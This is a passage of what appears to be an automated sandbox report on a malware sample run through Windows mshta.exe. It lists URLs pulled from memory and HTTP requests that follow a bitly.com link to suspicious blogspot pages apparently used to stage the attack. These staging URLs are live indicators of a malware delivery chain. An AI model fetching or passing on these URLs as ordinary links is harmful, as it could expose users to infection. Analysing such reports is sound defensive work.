Source: mshta.exe, 00000005.00000003.575813653.0000000004CA9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.509775441.00000000053D7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.509088540.0000000005398000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js
Source: mshta.exe, 00000005.00000003.495624663.0000000004C05000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsC:
Source: mshta.exe, 00000005.00000003.495957595.0000000004C63000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsWt
Source: mshta.exe, 00000005.00000003.495957595.0000000004C63000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsor(v
Source: mshta.exe, 00000005.00000003.495957595.0000000004C63000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsresi
Source: mshta.exe, 00000005.00000002.627872610.00000000004A9000.00000004.00000020.sdmp, mshta.exe, 00000005.00000003.495957595.0000000004C63000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.492266063.0000000004C8B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jst
Source: mshta.exe, 00000005.00000003.495161266.000000000046C000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.487509201.0000000005A25000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.598340126.0000000002F31000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.637352136.0000000002CD1000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.577881485.0000000002CD0000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.575813653.0000000004CA9000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.644746898.0000000004B80000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.495565196.0000000004BE9000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.576052142.0000000009031000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.455960614.00000000054B1000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.490317514.0000000003CC5000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.js
Source: mshta.exe, 00000005.00000002.636101223.0000000002C34000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.js)
Source: mshta.exe, 00000005.00000003.495206659.0000000000478000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.js0
Source: mshta.exe, 00000005.00000002.627872610.00000000004A9000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.jsa.html
Source: mshta.exe, 00000005.00000003.487509201.0000000005A25000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.495565196.0000000004BE9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/592772849-lbx__en_gb.js
Source: mshta.exe, 00000005.00000003.575813653.0000000004CA9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.509775441.00000000053D7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.456830185.000000000543E000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.509088540.0000000005398000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css
Source: mshta.exe, 00000005.00000003.493458774.0000000004C2A000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css%
Source: mshta.exe, 00000005.00000003.495957595.0000000004C63000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css(a
Source: mshta.exe, 00000010.00000003.456830185.000000000543E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssC:
Source: mshta.exe, 00000005.00000003.495206659.0000000000478000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssl
Source: mshta.exe, 00000005.00000003.487509201.0000000005A25000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.475498425.000000000535D000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.495565196.0000000004BE9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/4076883957-lightbox_bundle.css
Source: mshta.exe, 00000005.00000002.637239484.0000000002CC1000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.495339977.00000000004A9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.491152298.0000000000413000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1667664774-css_bundle_v2.css
Source: mshta.exe, 00000005.00000002.627872610.00000000004A9000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1667664774-css_bundle_v2.cssK
Source: mshta.exe, 00000005.00000002.627872610.00000000004A9000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1667664774-css_bundle_v2.csstml
Source: mshta.exe, 00000005.00000003.495206659.0000000000478000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.575813653.0000000004CA9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498024621.0000000003CE0000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.455960614.00000000054B1000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.js
Source: mshta.exe, 00000005.00000002.627872610.00000000004A9000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jsa.html
Source: mshta.exe, 00000005.00000003.580010849.0000000002DAD000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jshttps://johonathahogyaabagebarhomeint
Source: mshta.exe, 00000005.00000003.495957595.0000000004C63000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jsola.html
Source: mshta.exe, 00000010.00000002.509088540.0000000005398000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jsrack.jskE_1
Source: mshta.exe, 00000005.00000003.495206659.0000000000478000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jss
Source: mshta.exe, 00000005.00000002.636101223.0000000002C34000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/4164007864-widgets.jstice.jss
Source: mshta.exe, 00000005.00000003.495957595.0000000004C63000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/t
Source: mshta.exe, 00000005.00000003.494547408.0000000004CD9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com001=
Source: mshta.exe, 00000005.00000003.494547408.0000000004CD9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.comvider
Source: mshta.exe, 00000005.00000003.493526929.0000000004C4F000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/
Source: mshta.exe, 00000010.00000003.490488368.0000000005423000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/5
Source: mshta.exe, 00000010.00000003.490488368.0000000005423000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/?
Source: mshta.exe, 00000010.00000002.498024621.0000000003CE0000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.495476466.00000000003BF000.00000004.00000020.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: mshta.exe, 00000005.00000003.493918937.0000000004CC9000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js3182-comment_from_post_iframe.jswxYiWS5Af
Source: mshta.exe, 00000005.00000003.494547408.0000000004CD9000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsF-
Source: mshta.exe, 00000005.00000003.493458774.0000000004C2A000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsc
Source: mshta.exe, 00000005.00000003.495957595.0000000004C63000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsli
Source: mshta.exe, 00000005.00000003.495957595.0000000004C63000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsorials
Source: mshta.exe, 00000005.00000003.490329854.0000000002DA3000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsp
Source: mshta.exe, 00000005.00000003.478144848.0000000005373000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.577564882.0000000004D1C000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/debug/bootstrap
Source: mshta.exe, 00000005.00000003.577564882.0000000004D1C000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/gtm/js?id=
Source: mshta.exe, 00000005.00000003.577564882.0000000004D1C000.00000004.00000001.sdmp String found in binary or memory: https://www.google.%/ads/ga-audiences
Source: mshta.exe, 00000005.00000003.494547408.0000000004CD9000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/intl/en-GB/about/products?tab=jh
Source: mshta.exe, 00000005.00000003.491375552.000000000906A000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com
Source: mshta.exe, 00000005.00000003.496223994.0000000004C81000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/3
Source: mshta.exe, 00000005.00000003.577564882.0000000004D1C000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/ads/ga-audiences
Source: mshta.exe, 00000005.00000003.493526929.0000000004C4F000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.617367342.0000000002C3D000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.509537161.00000000053BF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.490488368.0000000005423000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/css/maia.css
Source: mshta.exe, 00000005.00000003.496223994.0000000004C81000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/cy
Source: mshta.exe, 00000005.00000003.496223994.0000000004C81000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/ht.png/
Source: mshta.exe, 00000005.00000002.645491196.0000000004C1E000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.495624663.0000000004C05000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.645213085.0000000004C05000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.509775441.00000000053D7000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657
Source: mshta.exe, 00000005.00000003.496223994.0000000004C81000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/uppo
Source: mshta.exe, 00000005.00000003.577564882.0000000004D1C000.00000004.00000001.sdmp String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
Source: mshta.exe, 00000005.00000003.475726679.0000000005366000.00000004.00000001.sdmp String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=https://www.google-analytics.com/gtm/js?id=
Source: mshta.exe, 00000005.00000003.493918937.0000000004CC9000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.577701681.0000000004D2E000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.456830185.000000000543E000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.509937648.00000000053FC000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Source: mshta.exe, 00000010.00000002.509937648.00000000053FC000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_dark_clr_74x24px.svg
Source: mshta.exe, 00000005.00000003.493918937.0000000004CC9000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_dark_clr_74x24px.svgSuM
Source: mshta.exe, 00000005.00000003.493918937.0000000004CC9000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_dark_clr_74x24px.svgf2cg
Source: mshta.exe, 00000010.00000002.509937648.00000000053FC000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svg
Source: mshta.exe, 00000005.00000003.493918937.0000000004CC9000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svg8v
Source: mshta.exe, 00000005.00000003.493918937.0000000004CC9000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svgLt
Source: mshta.exe, 00000005.00000003.493918937.0000000004CC9000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svgm/_
Source: mshta.exe, 00000005.00000003.577057515.0000000002CEA000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.png
Source: mshta.exe, 00000005.00000002.627872610.00000000004A9000.00000004.00000020.sdmp, mshta.exe, 00000005.00000003.598456528.00000000052BF000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.495339977.00000000004A9000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.png)
Source: mshta.exe, 00000005.00000003.491375552.000000000906A000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/search_black_24dp.png
Source: mshta.exe, 00000005.00000003.491375552.000000000906A000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.645614955.0000000004C33000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.495565196.0000000004BE9000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.645068218.0000000004BEA000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.auSrFW-FX90.O/rt=j/m=q_dnp
Source: mshta.exe, 00000005.00000003.491375552.000000000906A000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.645614955.0000000004C33000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.495565196.0000000004BE9000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.645068218.0000000004BEA000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.wtXa61WU3WQ.L.X.O/m=qawd
Source: mshta.exe, 00000010.00000002.509775441.00000000053D7000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\yuiwqhdsavbdjagh[1].htm Jump to behavior
Source: unknown DNS traffic detected: queries for: bitly.com
Source: global traffic HTTP traffic detected: GET /yuiwqhdsavbdjagh HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bitly.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoolaayoola.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: johonathahogyaabagebarhomeintum.blogspot.com
Source: global traffic HTTP traffic detected: GET /static/v1/widgets/1667664774-css_bundle_v2.css HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=8965474558532949541&zx=9facc617-3779-4049-ad62-56a50925e3fb HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/jsbin/403901366-ieretrofit.js HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/widgets/4164007864-widgets.js HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/jsbin/1621653182-comment_from_post_iframe.js HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: johonathahogyaabagebarhomeintum.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html&type=blog HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /img/icon18_edit_allbkg.gif HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: resources.blogblog.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: accounts.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogblog/data/1kt/simple/gradients_light.png HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: resources.blogblog.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogblog/data/1kt/simple/body_gradient_tile_light.png HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: resources.blogblog.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/v-css/281434096-static_pages.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/jsbin/3101730221-analytics_autotrack.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google-analytics.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /s/opensans/v23/mem5YaGs126MiZpBA-UN_r8OUuht.eot HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: fonts.gstatic.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /img/share_buttons_20_3.png HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
Source: global traffic HTTP traffic detected: GET /img/blogger-logotype-color-black-1x.png HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
Source: global traffic HTTP traffic detected: GET /p/ayoola.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: randikhanaekminar.blogspot.com
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=4778963473423104316&zx=f202e5b7-10a8-4731-a0ba-0a7b50381b0c HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
